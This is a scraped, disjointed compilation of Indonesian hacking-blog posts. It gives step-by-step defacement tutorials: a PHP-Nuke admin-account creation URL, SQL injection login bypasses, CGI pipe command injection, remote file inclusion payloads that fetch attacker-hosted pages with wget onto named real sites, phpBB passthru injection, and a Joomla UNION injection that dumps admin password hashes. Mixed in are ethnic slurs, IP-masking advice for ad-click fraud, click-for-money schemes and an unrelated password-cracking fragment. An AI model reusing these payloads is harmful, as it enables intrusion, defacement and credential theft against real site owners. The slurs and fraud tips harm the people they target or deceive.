You are on page 1of 41

Contoh deface

id.wikipedia.org
MEDAN
bajingan
CINA Bangsat…
…………yang
pernah merasa
sakit ati sama
CINA dea Cyndi
nyoto rahman
langkah-langkah deface website lengkap...!
udah lama nih udah nda nge posting tentang hacking maklum lagi
sibuk
cari dollar dan di sini saya akan menjelaskan berbagi macan jenis
deface
yang skarang di pergunakan para hacked indo untuk hack website
orang
malaysia untuk membela manohara....! (seperti emould.com.cn dan
hacked by x-blank )
wikipedia.org bajingan bangsat kaskus.us tikus got buaya darat
bangsat luuuuh kaskus racun aids

Kompolnas.go.id
Deface situs php nuke

Buka situs www.google.com


kemudian ketik =>
allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php.
Nah ….. kalo udah ketemu targetnya maka langkah
selanjutnya adalah :
1. www.id.wikipedia.org/nuke/index.php
2. www.id.wikipedia.org/nuke/admin.php =>
index.php yg diatas tadi dirubah
menjadi admin.php
3. Masukkan bug ini di belakang situs tadi :

Kaskus.us
?op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
misal : www.id.wikipedia.org/nuke/admin.php?
op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

Kalo nggak mau berarti situs tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing lu muncul
www.id.wikipedia.org/nuke/admin.php?op=mod_author

5. Disana lu di suruh login, masukin id & password lu tadi.


Masih ingat kan ?
id=budakbaonk => liat yg diatas tadi
password=bajingan => liat yg diatas tadi
Id.wikipedia.org
Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
Berarti lu udah mengusai situs tsb skrg ! He he he he he
Skrg lu pilih gambar Handphone (dibawahnya ada tulisan Messages),
Kolom title =>

Kolom content =>

Kolom expiration => unlimited


trus klik tab add messages yg ada dibawah
Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi,
misal www.id.wikipedia.org/nuke atau
www.id.wikipedia.org/nuke/index.php
kalo nggak ada hasil deface lu coba klik tab refresh yg ada
diatas yg disamping url/browsing lu

========================================

Deface asp/iis dgn menggunakan win 98

1. Klik Icon “My Computer” di komputer kamu.


2. Cari Icon “Web Folder” didalam My Computer Itu.
3. Klick lagi Icon “Add web folder” dan akan muncul
“Type the location to add”.
4. Ketiklah nama situs yang akan kita deface/tambahkan filenya
misalnya http://www.52down.com. Kemudian klik Next.
5. Muncul “Enter the name for this Web Folder”, kemudian klik Finish.
kalau tidak ada “Finish” nya atau “Error” artinya tidak bisa dideface
jadi kamu musti cari target lain.
6. Apabila sudah berhasil, kembali lagi ke Web Folder, disana kita
lihat
ada file http://www.52down.com. Klik file situs tsb.
7. Buka file “Hacked.html” kamu tadi (kalo belum ada file html,
lu buat dulu file html di ms.fronpage trus simpan di kompi lu)
terus copy kemudian kembali lagi ke file http://www.52down.com,
paste kan file “Test.html” tadi. Kalau tidak bisa di paste kan artinya
udah dipath sama adminnya, jadi kamu musti cari target lain.
8. Apabila sudah berhasil, kita lihat hasilnya di url/browsing
misalnya http://www.52down.com/Test.html
9. Kalau mau mencari target caranya cari di www.google.com terus
ketik allinurl:.com/index.asp atau allinurl:.org/default.asp
tinggal kreatifitas kamu mencari target.
Atau bisa cari target di http://www.zone-h.org/en/defacements/
klik mirror yg sebelah kanan (yg windows 2000),
Perhatikan target nya => Defacer: Infektion Group
Domain : www.namaid.wikipedia.org <<>

=======================================

cara membuat html :

Buka ms.frontpage, klik tab format diatas, trus pilih backgrounds,


trus pilih enable hyperlink, trus pilih color background,
pilih warna hitam, trus ok
Trus pilih tab center yg diatas (rata tengah) kayak ms.word,
ukuran huruf pilih no.5 (18pt), trus pilih font color (yg gambar A),
pilih warna merah, kalo udah tulis Hacked by nama nick kamu,
tekan enter 3 kali Trus ketik
Hey Admin……..do you a need help ? trus enter sekali,
trus tulis Matrix.Dal.Net - #surabayahack, trus enter 3 kali
Kalo kalo mau pake gambar pilih tab insert diatas, trus pilih pictures,
trus pilih from file…., di file name ketik
http://www.finagro.gov.co/902.gif atau cari file jpg/gif di pc lu
trus ok Kalo mau pake musik pilih tab format diatas,
trus pilih backgrounds trus pilih tab general,
pada “background sound location” ketik
http://www.indonesia.go.id/berkibar.mid atau cari file midi di pc lu
trus ok Utk nyimpan nya pilih tab file diatas, pilih save as…
file name : Hacked atau nama nick kamu, trus ok
Catatan : seandainya waktu lu nyimpan file ada keluar
“save embedded file” pilih “set action” trus pilih “dont save” trus ok
Utk meliat hasilnya pilih tab preview dibagian bawah.
=======================================

Deface guestbook (buku tamu)

Dengan menggunakan teknik SQL Injection,kita bisa mendeface


guestbook
(bukutamu) baik file php,asp,cfm,cgi,html dan kawan2. Ingat2 nggak
semua guestbook bisa dideface.
Langkah2 nya

I. Cari target guestbook di www.google.co.id dgn mengetikkan


site:my guestbook.php atau site:com bukutamu.php

II. Kalo udah dapat target nya, misalnya


www.namatarget.my/guestbook.php
maka yg perlu lu lakukan adalah mengisi kolom2 guestbook yg
tersedia.
Lu nggak perlu mengisi kolom guestbook nya dgn identitas asli,
cukup identitas palsu aja.

contoh :

Nama : boneka lucu


Email : boneka_2005@yahoo.com
Website : www.boneka-lucu.com
Asal : toko boneka
Komentar :

Perhatikan baik2 perintah yg ada di kolom komentar,dgn cara


SQL Injection ke guestbook tsb, disitu kita akan memasukkan
sebuah gambar (jgn gambar porno ya ? nggak boleh lho ?
ntar dimarah mama). Trus klik tombol “submit” atau tombol apa
namanya yg ada di guestbook tsb. Selanjutnya buka url/browsing
baru trus
ketik target tadi www.namatarget.my/guestbook.php
Kalo hasilnya belum ada, coba klik tab “refresh” di samping
url/browsing
lu. Nah…muncul deh gambar yg kita masukin tadi di guestbook tsb.
Berarti guestbook tsb bisa dideface.

Catatan :
Kalo nggak ada gambarnya, yg ada hanya tulisan

berarti guestbook tsb nggak bisa dideface. Lu jgn kecewa dong !


cari target yg lain.

III. Kalo udah muncul gambar yg kita masukkan tadi,


buka lagi guesbook tsb. Trus isi lagi kolom2 guestbook yg tersedia.

contoh :

Nama : deface
Email : deface_2005@yahoo.com
Website : www.deface.com
Asal : dunia maya
komentar :

Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL


Injection ke guestbook tsb, disitu kita akan memasukkan script utk
deface.

Catatan :
Sebelum lu memasukkan script diatas tadi, lu edit dulu kata2 nya
sesuai
keinginan lu.
IV. Klik tombol “submit” atau tombol apa namanya yg ada di
guestbook tsb.
Selanjutnya buka url/browsing baru trus ketik target tadi
www.namatarget.my/guestbook.php
Kalo hasilnya belum ada, coba klik tab “refresh” di samping
url/browsing lu.
Nah…muncul deh hasil deface kita di guestbook tsb.

======================================

deface asp dgn sql injection

1. buka browsing/url www.google.co.id


2. ketik site:go.id login.asp
misal nya kita dapat target www.namaid.wikipedia.org/login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru trus ketikkan target tadi misal nya
www.namaid.wikipedia.org
7. kalo hasil nya belum ada, klik tab refresh disamping url lu

======================================

deface cgi

https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/we
b_store.cgi?page=coart_frontpage.html <<<
page="coart_frontpage.html|pwd|" page="coart_frontpage.html|wget"
nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<<
target =""> allinurl:*.cgi * page:.*html+site:.us atau
http://www.google.co.id/search?q=allinurl:*.cgi%3Fpage%3D*.html+si
te:.com&hl=id&lr=&start=10&sa=N
target nya musti file html diujung nya kalo mau tambahin |pwd|

=======================================

deface cgi II

http://www.sports-media.org/adspro/cgi-
bin/adspro/dhtml.pl?page=top.htm|id|
http://www.sports-media.org/adspro/cgi-
bin/adspro/dhtml.pl?page=top.htm|pwd|
http://www.sports-media.org/adspro/cgi-
bin/adspro/dhtml.pl?page=top.htm|echo “Hacked by
psychophysiological. Hey admin…do you a need help ?
Matrix.Dal.Net - surabayahack” >
/usr/home/web/users/a0004481/html/adspro/jh.html|
http://www.sports-media.org/adspro/jh.html

http://www.sports-media.org/adspro/cgi-
bin/adspro/dhtml.pl?page=top.htm << page="top.htm|pwd|">>>>>>>
usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro
usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<<
html =""> http://www.sports-media.org/adspro/cgi-
bin/adspro/dhtml.pl?page=top.htm|whereis%20index.html|
http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|
echo “Hacked by psychophysiological. Hey admin…do you a need
help ? Matrix.Dal.Net - surabayahack”>decae.html|
&cart_id=9721374.5730
http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|
echo%20

======================================
deface php dgn injection

http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=
4
itu file aslinya
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path
=
itu bug nya
http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admi
n.php?phpbb_root_path=http://www.geocities.com/sandal_karet/scrip
t/arai2.jpg?
jadi index.php?name=PNphpBB2&file=index&c=4 dibuang
cara inject nya
http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admi
n.php?phpbb_root_path=http://www.geocities.com/sandal_karet/scrip
t/arai2.jpg?
dikotak command unix masukin
wget http://geocities.com/nusantarajaya_2004/arai.html
cara liat nya
http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html

http://www.narnia-chroniken.de <<<
phpbb_root_path="http://geocities.com/sandal_karet/script/arai2.jpg?"
>

========================================

deface php dgn injection II

http://www.giphted.com/index.php?siteName=pics%2Fom%2Findex.p
hp
itu file aslinya
http://www.giphted.com/index.php?siteName=http://www.geocities.co
m/sandal_karet/script/arai2.jpg?
dikotak masukin: pwd
jadi pics%2Fom%2Findex.php dibuang
cara inject nya
http://www.giphted.com/index.php?siteName=http://www.geocities.co
m/sandal_karet/script/arai2.jpg?
dikotak masukin: wget
http://www.geocities.com/nusantarajaya_2004/arai.html -O
/export/home/beangyy/www/arai.html
cara liat nya http://www.giphted.com/arai.html

=========================================

deface phpbb/forum

http://www.bpmpt.go.id/forum/index.php
itu file aslinya
includes/db.php?phpbb_root_path=
itu bug nya
jadi index.php dibuang
http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http
://www.geocities.com/sandal_karet/script/ara2.jpg?
dikotak masukin: pwd
Kalo keluar “Hacking attempt” artinya dipath
Tapi kalo berhasil, terserah lu mau di apain……

==========================================

deface phpbb/forum II

http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12
itu file aslinya
&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pw
d
itu bug nya
cara inject nya
http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight=%25
27.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd

cara wget nya ada 3 cara :


1.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2
527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geoci
ties.com/nusantarajaya_2004/arai.html;ls
2.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2
527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geoci
ties.com/nusantarajaya_2004/arai.html -O
/var/www/singapore/jh2.htm
3.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2
527.passthru($HTTP_GET_VARS[a]).%2527&a=lwp-
download%20http://geocities.com/nusantarajaya_2004/arai.html;ls
biasa nya cara ke 3 yg berhasil.

cara liat nya http://singapore.bluejackings.net/arai.html

=========================================

cara liat fs tanpa login

http://www.friendster.com/useropen.php?uid=
<<<<<<>

===========================================

deface php dgn injection III

langsung di tembak aja bos biar ga lama2


www.id.wikipedia.org/modules/PNphpBB2/includes/functions_admin.
php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?
kolo berhasil seperti biasa
cmd sql php injection
buat nyari akses ke foldernya
cmd => find / -perm 777 -type d
klo foldernya permision denied berarti kita ga bisa apa2 di folder itu
cari folder yg ga ada tulisan perm
ambil contoh ini
http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/fun
ctions_admin.php?phpbb_root_path=http://www.geocities.com/ank_n
ewz/sql.htm?
cari akses foldernya [commndnya diatas]
cmd => find / -perm 777 -type d
bakal makan B/w
jd sabar aja
=== contoh -perm denied ==
find: /mnt/drive2/lost+found: Permission denied
find: /proc/tty/driver: Permission denied
find: /proc/1/task/1/fd: Permission denied
itu artinya no akses
kita cari yg lain
tp usahakan foldernya yg /var/www/
klo ga ada juga gpp
ada yg lain
/home/httpd/vhosts/hdca.org/httpdocs/downloads => contoh folder yg
bisa
cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;[command dasar
OSnya]
[command dasar OSnya] => wget, dir, cat, rm, rv -rf dll
skarang kita wget
cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;wget
http://www.geocities.com/nusantarajaya_2004/arai.html
coba lo masukin
ke cmdnya
———————————————————
–10:35:01– http://www.geocities.com/nusantarajaya_2004/arai.html
=> `arai.html’
Resolving www.geocities.com… 66.218.77.68
Connecting to www.geocities.com[66.218.77.68]:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 6,021 [text/html]
0K ….. 100% 98.21 KB/s
10:35:02 (98.21 KB/s) - `arai.html’ saved [6,021/6,021]
———————————————————
itu artinya sukses ke save
karena httpdocs
gampang cara liatnya
/home/httpd/vhosts/hdca.org/httpdocs/downloads =>
www.hdca.org/downloads/[file deface lo]
contoh www.hdca.org/downloads/arai.html
selsai deh
gampang kan

http://www.zone-
h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/
http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk=
http://www.tyg2004.de/index.php?page=http://www.geocities.com/jam
bihackerlinkcrew/sql.htm?&cmd=id;pwd
http://img143.imageshack.us/img143/6782/hacked8lc.jpg
http://www.sobatpadi.net/download/

http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://w
ww.geocities.com/dian_maulani2005/inject.htm?&cmd=id;pwd;ks%20
-la
http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani

memanfaatkan google untuk curi password website...!

cara sangat mudah cukup copas perintah berkut :

"# -FrontPage-" ext:pwd inurl:(service | authors | administrators |


users) "# -FrontPage-"

di google.co.id ato google.com


kemudian lihatlah semua web yang memiliki bug pasti tercetak oleh
omm kesayanganku yaitu omm google...!

segitu aja dulu aja ya....!


hack ip untuk para hacker

hack ip ini sering saya gunakan pada saat saya ingin main curang
pada beberapa
media yang memberikan uang kepada saya seperti
kumpulblogger.com ato adsense

untuk hack IP address (agar IP address kita berubah, caranya


gampang bgt).
pergi kesini, dan tinggal masukkan URL yang anda tuju:

http://anonymizer.nntime.com/

download pengubah IP address disini

http://www.unrestrictedsurf.com/

Cuma segitu aja, semoga berguna!!


meningkatkan pengunjung sekaligus berburu dollar

Pertama kali blog anda dipublikasikan, anda pasti selalu berharap


ada pengunjung yang bertamu. Namun kadang-kadang pengunjung
yang diharapkan itu tidak sesuai harapan. Semua masalah itu umum
dilalui oleh peblogger.
Sekarang anda jangan khawatir tentang jumlah pengunjung yang
datang bertamu ke blog anda. Hebatnya lagi selain dibanjiri oleh
pengunjung, anda juga dapat bonus berupa Dollar. Jangan lewatkan
kesempatan emas ini..Ikuti yuk cara-caranya.
Lihat banner dibawah ini, dapat anda klik untuk melakukan
pendaftaran. Mudah kok...tinggal memasukan alamat email anda,
maka anda telah terdaftar di Venifine. Coba yah...!

Join Vinefire!
1. Register/Daftar ke Vinefire.com

vinefire merupakan sebuah program yang menawarkan bagi hasil


uang sebanyak $50/Hari bagi free member dan $100/Hari bagi
Premium member (untuk menjadi premium member hanya dengan
membayar $5 saja), anda dapat bagi hasil uang hanya dengan
melakukan klik link ($0,45), vote link($0,55), dan add link($0,12).
program ini akan membayar membernya pada tanggal 31 Januari
2010.
isi semua data - data anda dengan benar.

2. Setelah menjadi member di Vinefire.com anda tinggal masuk ke


menu add link, masukkan link blog anda beserta judulnya, lalu klik
tombol add link. Lakukan cara tersebut sampai seluruh link yang
anda miliki masuk ke Vinefire.com. Coba anda bayangkan apabila
pada saat anda memasukkan link tersebut member vinefire.com yang
aktif sebanyak 50 orang , yang sedang mencari uang tambahan
dengan mengklik link yang ada di situ juga termasuk link anda, anda
sudah mendapatkan 50 pengunjung di blog anda, apalagi kalau
member vinefire.com sedang banyak - banyaknya maka bersiap -
siaplah blog anda kebanjiran pengunjung. anda dapat add link di
vinefire.com berkali - kali dalam satu hari dalam rentang waktu 40
detik, asalkan link yang anda masukkan berbeda, trik untuk
mengatasi hal ini adalah, anda posting sebanyak - banyaknya di blog
anda, maka setiap posting yang anda buat pasti berbeda - beda
linknya sesuai label atau judul yang anda masukkan, gunakan link
tersebut untuk di add link di vinefire.com , bayangkan bila anda
memiliki 100 postingan dan anda memasukkan 100 link ke
vinefire.com dalam selang waktu 40 detik, dan member vinefire.com
yang online sedang banyak, waaaaah mendapatkan pagerank terbaik
untuk blog anda bukan lah hal yang sulit. udah blog kita terkenal
dapet duit lagi $50 /hari..! Mantaaap! sudah terbukti..!
Ayo...daftar segera...dan siap-siap anda akan kebanjiran
pengunjung...!!!
Anda tidak perlu berpikir masalah dollarnya..sebagai peblogger,
meningkatnya jumlah pengunjungpun merupakan kebanggan sendiri.
Sql Injection pada Joomla (ternyata joomla punya kelemahan juga
ya...!)
Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika
admin tidak memperhatikan security risk yang ada? Apa jadinya jika
'the choosen one' ternyata seorang admin yang tidak tahu sama
sekali mengenai system keamanan sebuah data? Ironi memang.
Bahkan terkadang ada admin yang meremehkan system keamanan.
Apa jadinya jika server anda memiliki konfigurasi default? Apa
jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan
dua kata tersebut. Yang terjadi adalah peluang seorang attacker
untuk menyusup ke dalam website anda semakin memungkinkan,
mengobrak-abrik server anda, bahkan tidak jarang seorang attacker
mengambil profit dari exploitasi system yang ada. Dalam berbagai
hal, termasuk mendulang dollar dengan cara tidak halal. Seperti yang
dilakukan oleh para carder.

Penulis akan menjelaskan betapa mudahnya sebuah web


dieksploitasi hanya dengan bermodalkan internet dan browser
internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis
jelaskan, penulis hanyalah seorang manusia biasa yang memiliki
pengetahuan minimal dari sistem keamanan data.

Ya, belum lama ini, salah satu component joomla terbukti mengidap
penyakit berbahaya, tumor ganas yang akan menjalar keseluruh
tubuh, dan berakibat kematian pada akhirnya. :D~~

Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah


salah satu contoh dari sekian banyak bug fatal yang terdapat dalam
joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak
menyediakan filtering sql yang ketat dalam variable feed_id.
Penyusupan dapat dilakukan, sederhananya ini terjadi karena
kesalahan dari variable feed_id. Dan saat menulis artikel ini ada
beberapa site masih memiliki kecacatan seperti ini.

Ya, Langsung aja ...

http:// korban.com/index2.php?option=ds-
syndicate&version=1&feed_id=1

Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita
tes kelemahannya, dengan penambahan tanda kutip ( ' ) di
belakangnya.

http:// korban.com/index2.php?option=ds-
syndicate&version=1&feed_id=1'

Apa yang terjadi ? ... error...

Langkah selanjutnya adalah cari urutan si table 'dssyndicate_feeds'


dengan mendapatkan bentuk error yang sama, dan berhenti ketika
mendapatkan error yang berbeda :
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/*
--> errornya sama

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/*
--> errornya sama

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/*
--> errornya sama

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/*
--> errornya sama

index2.php?option=ds-
syndicate&version=1&feed_id=1+order+by+20/* --> errornya
sama

index2.php?option=ds-
syndicate&version=1&feed_id=1+order+by+21/* --> errornya
berbeda

perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan


1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql
yang selanjutnya.

Langkah selanjutnya adalah penggunaan union, lebih jelasnya


mengenai fungsi union, silahkan baca di sini.

Selanjutnya kita test, apakah fungsi union dapat berjalan pada url
korban.
index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,1
0,11,12,13,14,

15,16,17,18,19,20+from+jos_users

lihat paling akhir dari baris tersebut,

from+jos_users

jos_users adalah nama table yang diambil dari struktur database


joomla. Berisi mengenai informasi login user.

Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini


diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.

Ya setelah url di atas di enter, yang perlu dilakukan adalah


mendownload file tersebut,

Setelah itu buka file yang baru didownload tersebut dengan editor
seperti notepad, walaupun filenya xml, tapi penulis tetap
menyarankan untuk membukanya dengan notepad, tidak dengan
browser internet, karena memudahkan untuk pembacaan hasil dari
sql injection yang telah dilakukan.

Lihat angka 2 di dalam tag


Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan
adalah angka 2-nya. Ini berarti berdasarkan hasil query union
menggunakan browser tadi, anda dapat menggunakan angka 2
tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2
dengan kumpulan karakter lain untuk menggunakannya seperti
melihat versi mysql yang digunakan, ya langsung saja, kita akan
mencobanya untuk melihat versi mysql yang digunakan oleh si
korban. Gunakan url ini ...

http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,

@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from

+jos_users

perhatikan angka 2 diganti dengan kalimat @@version, enter,


kemudian buka kembali file telah di download dengan notepad, apa
yang terjadi ? title berubah menjadi versi si mysql, yang penulis
dapatkan :

Mysql versi 5.0.33 :D, sampai sini anda telah dapat eksplorasi
database user dengan leluasa. Apa yang dilakukan seorang attacker
selanjutnya ? ya, mendapatkan username dan password si admin.
:D.
Pengambilan username dan password secara paksa menggunakan
sql injection ini dapat dilakukan secara satu persatu, ataupun
sekaligus. Query untuk menampilkan username menggunakan bug
sql injection yang satu ini, anda cukup mengganti @@version yang
tadi dengan field yang menyimpan informasi username tentunya,
gunakan url ini :

http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,

username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_
users

jalankan url, download filenya, kemudian buka kembali dengan


notepad. Hasilnya adalah username dari database tersebut ...

Atau bisa juga ditampilkan informasi username, password, email, dan


user_type sekaligus, gunakan url seperti ini :

http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,

concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,

4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users
perhatikan, string username, diganti dengan
concat(username,0x3a,password,0x3a,email,0x3a,usertype),
penggunaan concat disini adalah mengconvert suatu hexa, ataupun
spesial karakter kedalam bentuk ascii, sehingga, yang terjadi
nantinya adalah :

0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di
atas. Yang penulis dapatkan adalah informasi seperti ini :

admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:al
kemail@gmail.com:Super Administrator

Jika di urutkan :

Username : admin

Password ( hash ) :
bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK

Email : alkemail@gmail.com

User type : Super Administrator

Yang di lakukan selanjutnya adalah mencoba crack password,


karena itu masih dalam bentuk hash, dengan kata lain password
yang masih terenkripsi. :D. Yups, pengambilan username dan
password secara paksa telah terjadi, si attacker kembali mencari cara
bagaimana mendapatkan password yang asli, dengan cara
mengcrack password hash tersebut.

Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker,
akibat dari seorang admin yang malas melakukan patch pada
systemnya.

Di artikel selanjutnya penulis akan menjalankan konsep sederhana


password crack untuk joomla menggunakan php. Tunggu
kelanjutannya ... :D.

Untuk keperluan eksperimen, silahkan download filenya di sini.

http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0
.15-Stable-Full_Package.zip

http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-
syndicate.tar.gz

cara dapatkan rupiah dari kumpulblogger

Kumpul Blogger merupakan situs yang dapat anda jadikan media


untuk mendapatkan hasil tambahan berupa rupiah. Caranya tidak
sulit, daftar kemudian sisihkan ruangan pada blog anda untuk
memasang iklan yang bentuk penampilannya telah ditentukan oleh
pihak kumpul blogger.
Bergabunglah dengan kumpul blogger...!! Daftarkan segera...!!
Caranya...??

* Buka alamat situs ini : http://kumpulblogger.com


* Klik Register yang terdapat dibagian kanan atas untuk daftar
* Masukan email anda yang juga sebagai user login anda dan
isikan juga dua kata yang tampil dibawahnya pada kotak yang
disediakan
* Klik tombol register
* Tunggu sebentar sampai anda diminta untuk mengecek email
* Buka email anda kemudian cek email dari kumpul blogger untuk
mendapatkan kode/pasword untuk login.
* Kembali ke http://kumpulblogger.com, selanjutnya anda lakukan
login dengan email sebagai user dan kode/password dari email
sebagai password anda (kotak login ada disebelah kanan atas).
setelah selesai, klik tombol login yang berwarna hijau.
* Setelah berada di halaman acount anda, silahkan anda coba satu
persatu menu yang terdapat di sebelah kiri.
* Klik menu tambah blog untuk mendaftarkan blog anda. Isi data-
data yang disediakan dengan data blog anda
* Klik menu Script Text Advertising untuk Blog anda, kemudian
copy kodenya dan letakan pada blog anda. Bentuk tampilannya akan
seperti ini. Coba anda klik salah satu link pada klom dibawah ini.
* Klik menu Script Mini Banner untuk Blog anda, kemudian copy
kodenya dan simpan pada blog anda. Penampilannya seperti ini
* Lakukan hal yang sama pada menu-menu lainnya
* Selamat mencoba..semoga bermanfaat...!!

Link Refferal Anda adalah :


http://Kumpulblogger.com/signup.php?refid=69320

Anda dapat mengajak teman-teman anda untuk mendaftarkan juga


ke kumpulblogger.com, Apabila mereka bergabung atas rekomendasi
anda, maka setiap 1 kali klik dari pengunjung blog mereka, Anda
akan mendapatkan 25 Rupiah.
Refferal hanya berlaku untuk level satu saja.

http://Kumpulblogger.com/signup.php?refid=69320
Promosikan dan Gunakan URL tersebut untuk memperbanyak
anggota kumpulblogger.com yang tergabung dibawah rekomendasi
anda.
Bagaimana Cara Mendapatkan Peringkat di Search Engine???

Ranking website di search engine yang tinggi boleh dikatakan jadi


jaminan tingginya traffic ke website tersebut. Semakin banyak
pengunjung berarti semakin banyak peluang kita mendapatkan
keuntungan dari produk yang kita tawarkan di website kita. Banyak
orang yang bingung bagaimana caranya meraih Ranking Di Search
Engine. Ada yang membeli software berharga jutaan rupiah, ada pula
yang menyewa perusahaan SEO dengan dana jutaan pula.
Sebenarnya ada cara sederhana dan instan yang bisa digunakan
tanpa perlu modal besar.

yuuk ikuti langkah-langkahnya...

1. Browsing ke search engine besar yaitu Google dan Yahoo saja,


yang lain tidak perlu, dengan mengetikkan kata yang sesuai dengan
produk/layanan website anda. Misalnya isi website anda mengenai
bisnis online, ketikkan bisnis+online. Sebentar kemudian akan
muncul sederet link website pesaing anda yang memiliki keyword
bisnis online tersebut.

2. Catat lima website yang muncul teratas dari deretan itu dan
kunjungilah tiap website tersebut.

3. Dari tiap website, lihat source kodenya. Misalnya anda pakai


Internet Explorer, klik menu View di kiri atas dan pilih Source. Dari
source kode tersebut lihat dan simpan keyword yang mereka
gunakan.

4. Edit header website Anda. Copy sebagian (atau semua? ) keyword


tersebut ke header website Anda. Sekarang keyword website Anda
sudah sama atau hampir sama dengan lima website pesaing anda
yang lebih dulu sudah memiliki ranking top.

5. Daftarkan kembali website anda ke search engine terutama


Google dan Yahoo. Setiap saat search engine mendata website
dengan keywod bisnis online, maka website anda akan terkatrol naik.
Tapi tunggu dulu. Jangan buru-buru berpuas diri. Apa gunanya
keyword bagus kalau layanan yang anda berikan tidak dapat
mengimbangi pesaing anda. Jadi lakukan langkah berikut.

id.wikipedia.org

6. Kunjungi website pesaing anda dan pelajari apa keunggulan


mereka yang tidak anda miliki. Lihat isi konten mereka. Copy artikel-
artikel mereka yang tinggi hitsnya ke website anda, tentunya dengan
tetap mencantumkan sumbernya. Mungkin website pesaing anda
menawarkan download gratis satu sample ebook. Contohlah dan
berikan layanan serupa di website anda, kalau bisa dengan kualitas
lebih baik dari saingan anda, umpamanya bisa download ebook
bukan versi sample tapi full version, dan bukan cuma satu tetapi 5
sekaligus!

7. Bergabunglah menjadi member, mendaftar di forum dan mengikuti


layanan newsletter di website pesaing anda. Dengan demikian anda
akan selalu mengetahui setiap kali pesaing anda melakukan update
atau meluncurkan produk baru. Anda juga jadi tahu trend atau
segmentasi konsumen mereka yang adalah setipe dengan calon
konsumen anda. Anda tinggal mengikuti.

8. Bila website pesaing anda menyediakan ruang iklan, pasang iklan


website Anda.

dan saya sudah membuktikanya liat I am cracking a password file for


a client, and have a copy of the NTDS.DIT

file from a domain controller (win2k/Active Directory). We do not


haveaccess to L0phtcrack currently, and I'm on a deadline. I was
going to useJohn the Ripper with some plugins written by 3rd parties
to crack thepassword file, but apparently the NTDS.DIT file isn't really
a hashed filethat John can read After some research, I found that you
can use PWDUMP2 to actually export theuser/pw information on the
DC to a hashed file that you can then crack withJohn (even if syskey
is used after SP2).

However, in order for PWDUMP towork, you have to run it as an


administrator from the DC itself, where itinjects its own .dll into the
lsass.exe process, which I no longer haveaccess to.

